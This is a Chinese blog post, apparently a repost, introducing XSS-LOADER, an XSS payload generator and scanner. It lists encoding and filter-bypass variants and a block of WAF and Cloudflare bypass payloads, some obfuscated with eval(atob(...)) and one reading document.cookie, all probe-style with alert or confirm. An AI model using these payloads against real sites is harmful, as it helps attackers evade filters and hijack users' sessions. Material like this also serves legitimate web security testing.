专栏首页鸿鹄实验室XSS-LOADER 一款xss生成、扫描器

XSS-LOADER 一款xss生成、扫描器

最近好像一直在鸽,主要是实验室最近有点忙,项目忙不过来,给各位观众老爷说声抱歉。今天介绍的是一款xss工具。XSS-LOADER

工具由python3编写,功能强大,我们来看一下他的一些使用方法:

比如我们选择BASIC PAYLOAD

他会让我们接下来选择编码的方式:

大约支持下面这些编码方式

* |   1.  UPPER CASE---->  <SCRIPT>ALERT(1)</SCRIPT>              
* |   2.  UPPER AND LOWER CASE----> <ScRiPt>aleRt(1)</ScRiPt>   
* |   3.  URL ENCODE ----->   %3Cscript%3Ealert%281%29%3C%2Fscript%3E           
* |   4.  HTML ENTITY ENCODE----->  &lt;script&gt;alert(1)&lt;/script&gt; 
* |   5.  SPLIT PAYLOAD ----->  <scri</script>pt>>alert(1)</scri</script>pt>>       
* |   6.  HEX ENCODE ----->  3c7363726970743e616c6572742831293c2f7363726970743e       
* |   7.  UTF-16 ENCODE -----> Encode payload to utf-16 format.   
* |   8.  UTF-32 ENCODE----->  Encode payload to utf-32 format.          
* |   9.  DELETE TAG -----> ";alert('XSS');//            
* |  10.  UNICODE ENCODE----->    %uff1cscript%uff1ealert(1)%uff1c/script%uff1e         
* |  11.  US-ASCII ENCODE ----->  ¼script¾alert(1)¼/script¾      
* |  12.  BASE64 ENCODE ----->   PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==          
* |  13.  UTF-7 ENCODE ----->   +ADw-script+AD4-alert(1)+ADw-/script+AD4-           
* |  14.  PARENTHESIS BYPASS ----->  <script>alert`1`</script>   
* |  15.  UTF-8 ENCODE ----->  %C0%BCscript%C0%BEalert%CA%B91)%C0%BC/script%C0%BE          
* |  16.  TAG BLOCK BREAKOUT-----> "><script>alert(1)</script>
* |  17.  SCRIPT BREAKOUT----->  </script><script>alert(1)</script>
* |  18.  FILE UPLOAD PAYLOAD-----> "><script>alert(1)</script>.gif
* |  19.  INSIDE COMMENTS BYPASS-----> <!--><script>alert(1)</script>-->
* |  20.  MUTATION PAYLOAD-----> <noscript><p title="</noscript><script>alert(1)</script>">
* |  21.  MALFORMED IMG-----> <IMG """><script>alert(1)</script>">
* |  22.  SPACE BYPASS-----> <img^Lsrc=x^Lonerror=alert('1');>
* |  23.  DOWNLEVEL-HIDDEN BLOCK-----> <!--[if gte IE 4]><script>alert(1)</script><![endif]-->
* |  24.  WAF BYPASS PAYLOADS-----> Show Waf Bypass Payload List
* |  25.  CLOUDFLARE BYPASS PAYLOADS-----> Show Cloudflare Bypass Payload 

我们可以看一下他的wafbypass:

就是一些内置的bypass语句,当然还有专门waf的bypass,也就是cf:

 <svg onload=prompt%26%230000000040document.domain)>                                                        
<svg onload=prompt%26%23x000000028;document.domain)>                                                                         
xss'"><iframe srcdoc='%26lt;script>;prompt`${document.domain}`%26lt;/script>'>                                               
<svg/onload=&#97&#108&#101&#114&#00116&#40&#41&#x2f&#x2f                                                                     
<a href="j&Tab;a&Tab;v&Tab;asc&NewLine;ri&Tab;pt&colon;&lpar;a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;(document.domain)&rpar;">X</a>    
<img%20id=%26%23x101;%20src=x%20onerror=%26%23x101;;alert`1`;>                                                               
<svg%0Aonauxclick=0;[1].some(confirm)//                                                                                      
<a"/onclick=(confirm)()>click                                                                                                
<a href="j&Tab;a&Tab;v&Tab;asc&NewLine;ri&Tab;pt&colon;&lpar;a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;(document.domain)&rpar;">X</a>    
<sVg/oNloAd=”JaVaScRiPt:/**\/*\’/”\eval(atob(‘Y29uZmlybShkb2N1bWVudC5kb21haW4pOw==’))”>                                      
<iframe src=jaVaScrIpT:eval(atob(‘Y29uZmlybShkb2N1bWVudC5kb21haW4pOw==’))>                                                   
<a href=”j&Tab;a&Tab;v&Tab;asc&NewLine;ri&Tab;pt&colon;\u0061\u006C\u0065\u0072\u0074&lpar;this[‘document’][‘cookie’]&rpar;”>X</a>                                                                                                                        
<iframe src=”%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A%3Aalert(0)”>                                                        
%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A%3Aalert(0)                                                                       
%253%63svg%2520onload=alert(1)%253%65                                                                                        
<img%20id=%26%23x101;%20src=x%20onerror=%26%23x101;;alert`1`;>                                                               
<select><noembed></select><script x=’a@b’a>y=’a@b’//a@b%0a\u0061lert(1)</script x>                                           
<a+HREF=’%26%237javascrip%26%239t:alert%26lpar;document.domain)’> 

当然也可以输入自己的payload。

除了上面的功能还有xss扫描功能:

也支持批量扫描...

工具地址:

https://github.com/capture0x/XSS-LOADER/

本文分享自微信公众号 - 鸿鹄实验室(gh_a2210090ba3f),作者:鸿鹄实验室a

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2020-03-27

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • XSS 扫描器成长记

    为了实现自动刷SRC的目标,过年前就开始对w13scan的xss扫描功能进行优化,灵感来源于xray所宣称的基于语义的扫描技术。

    Seebug漏洞平台
  • W13Scan 漏洞扫描器之XSS插件模块编写示例

    上周将W13Scan目录结构整理了一番,觉得要深入研究还得从代码层,于是尝试编写一下插件;框架本身已经集成了XSS扫描插件;

    汤青松
  • VOOKI:一款免费的Web应用漏洞扫描工具

    Vooki是一款免费且用户界面友好的Web应用漏扫工具,它可以轻松地为你扫描任何Web应用并查找漏洞。Vooki主要包括三个部分,Web应用扫描器,Rest A...

    FB客服
  • 使用Fiddler的X5S插件查找XSS漏洞

    作者 Taskiller OWASP top 10的安全威胁中的CrossSite Scripting(跨站脚本攻击),允许攻击者通过浏览器往网站注入恶意脚本。...

    FB客服
  • 利用XSStrike Fuzzing XSS漏洞

    关于XSStrike这款工具虽有前人写过相关资料,但是已经历经一年之久了,这款工具已经发生重大的改变(如从仅支持python2.7 改变为python 3.6)...

    FB客服
  • Flash XSS检测脚本的简单实现

    前言 这里主要是讲如何快速扫描到有问题的flash文件,用于批量,有时候很笨的方法也会有奇效,下面记录一下在实现过程中的一些思路和遇到的一些坑。 ? 第三方插件...

    FB客服
  • FinDOM-XSS:一款针对DOM型XSS漏洞的快速扫描工具

    FinDOM-XSS是一款针对DOM型XSS漏洞的快速扫描工具,广大安全研究人员可以利用FinDOM-XSS快速地发现/扫描出目标应用中潜在的DOM型XSS漏洞...

    FB客服
  • 小记 - Xray

    Xray是一款功能强大的安全评估工具,支持常见Web漏洞的自动化监测,可以在Github免费下载。且Xray为单文件命令行工具,自带所有依赖,解压即可使用无需安...

    Naraku
  • 渗透测试之地基钓鱼篇:thinkphp平台XSS钓鱼

    该篇章目的是重新牢固地基,加强每日训练操作的笔记,在记录地基笔记中会有很多跳跃性思维的操作和方式方法,望大家能共同加油学到东西。

    FB客服
  • JSshell:一款针对XSS漏洞的JavaScript反向Shell

    JSshell是一个JavaScript反向Shell工具,该工具可以帮助广大研究人员远程利用XSS漏洞或扫描并发现XSS盲注漏洞。当前版本的JSshell支持...

    FB客服
  • 米斯特白帽培训讲义 工具篇 Safe3 WVS

    Safe3 WVS 是一款使用较为领先的智能化爬虫技术及 SQL 注入状态检测技术的工具,相比国内外同类产品智能化程度更高,速度更快,结果更准确。

    ApacheCN_飞龙
  • 安全从业人员常用工具指引

    简介 一直以来嫌麻烦没注册freebuf,总是以游客的身份在看一些东西,今天特此注册了一下,首先要表扬一下freebuf,安全验证比较给力,其次感谢平台收集并整...

    FB客服
  • 测试常见面试的总结(二)

    Meccer
  • 分布式Web漏洞扫描服务建设实践—衡量指标及解决实践(2)

    一款扫描产品上线后,我们经常会反思到底做得怎么样呢?那么如何去衡量一款扫描器的优劣呢?我们确定了几个指标:准确率、扫描及时度及自主发现率,通俗来讲就是如何更快、...

    网络安全观
  • 一文带你网络安全 入门到入* [网络安全]

    笔记来源B站视频(知识区>野生技术协会) 黑客攻防 从入门到入yu【網絡安全】:https://www.bilibili.com/video/BV1E4411...

    天钧
  • 2018最新款渗透测试框架 | Fsociety搞定各种姿势脚本

    Fsociety是一款最新的渗透测试框架,可以帮助各位兄弟在安全测试过程中拥有变身成黑客所需要的各种姿势脚本。 这个工具刚刚出现,目前大概分为以下9类,后续还会...

    FB客服
  • 2018最新款渗透测试框架,Fsociety搞定各种姿势脚本

    Fsociety是一款最新的渗透测试框架,可以帮助各位兄弟在安全测试过程中拥有变身成黑客所需要的各种姿势脚本。(仅供专业人士安全测试。切勿干违法的事情。)

    C4rpeDime
  • 优秀工具 | Xray:一款功能强大的Web安全评估工具

    近几日,上线了一款功能强大的Web安全评估工具 - Xray,据说很多小伙伴都拿它挖到了漏洞,这几天我也试试了,确实不错,至于漏洞嘛,也是扫到了几个。还在继续深...

    7089bAt@PowerLi
  • 静态代码扫描方法及工具介绍

    静态扫描就是不运行程序,通过扫描源代码的方式检查漏洞,常见的方法也有多种,如把源代码生成 AST(抽象语法树)后对 AST 进行分析,找出用户可控变量的使用过程...

    信安之路

扫码关注云+社区

领取腾讯云代金券